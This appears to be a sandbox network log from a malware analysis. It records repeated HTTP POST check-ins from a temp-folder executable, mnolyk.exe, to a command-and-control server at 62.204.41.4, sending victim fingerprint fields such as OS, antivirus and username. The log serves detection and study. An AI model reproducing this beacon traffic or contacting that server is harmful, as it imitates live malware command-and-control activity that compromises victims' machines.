Feb 7, 2023 20:03:42.173293114 CET	761	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:42.237587929 CET	761	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
607	192.168.2.6	50332	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:42.434856892 CET	762	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:42.499845028 CET	762	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
608	192.168.2.6	50333	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:42.674478054 CET	763	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:42.738182068 CET	763	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
609	192.168.2.6	50334	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:42.924732924 CET	764	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:42.988635063 CET	764	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.6	49781	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:05.723793983 CET	181	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:05.788511992 CET	181	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
610	192.168.2.6	50335	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:43.169375896 CET	765	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:43.234117985 CET	765	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
611	192.168.2.6	50336	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:43.422466040 CET	766	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:43.485089064 CET	766	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
612	192.168.2.6	50337	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:43.661817074 CET	767	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:43.726258039 CET	767	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
613	192.168.2.6	50338	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:43.908584118 CET	768	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:43.971452951 CET	768	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
614	192.168.2.6	50339	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:44.150749922 CET	769	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:44.215348959 CET	769	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
615	192.168.2.6	50340	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:44.394521952 CET	770	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:44.458031893 CET	770	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
616	192.168.2.6	50341	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:44.643208981 CET	771	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:44.706828117 CET	771	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
617	192.168.2.6	50342	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:44.892172098 CET	772	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:44.955727100 CET	772	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
618	192.168.2.6	50343	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:45.134037018 CET	773	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:45.200069904 CET	773	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
619	192.168.2.6	50344	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:45.384588957 CET	773	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:45.446480989 CET	774	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.6	49782	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:06.291220903 CET	182	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:06.356937885 CET	182	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
620	192.168.2.6	50345	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:45.626091003 CET	775	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:45.689590931 CET	775	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
621	192.168.2.6	50346	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:45.861769915 CET	776	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:45.927083969 CET	776	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
622	192.168.2.6	50347	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:46.099226952 CET	777	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:46.165688038 CET	777	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
623	192.168.2.6	50348	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:46.349889040 CET	778	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:46.412662029 CET	778	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
624	192.168.2.6	50349	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:46.609528065 CET	779	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:46.673799038 CET	779	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
625	192.168.2.6	50350	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:46.848979950 CET	780	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
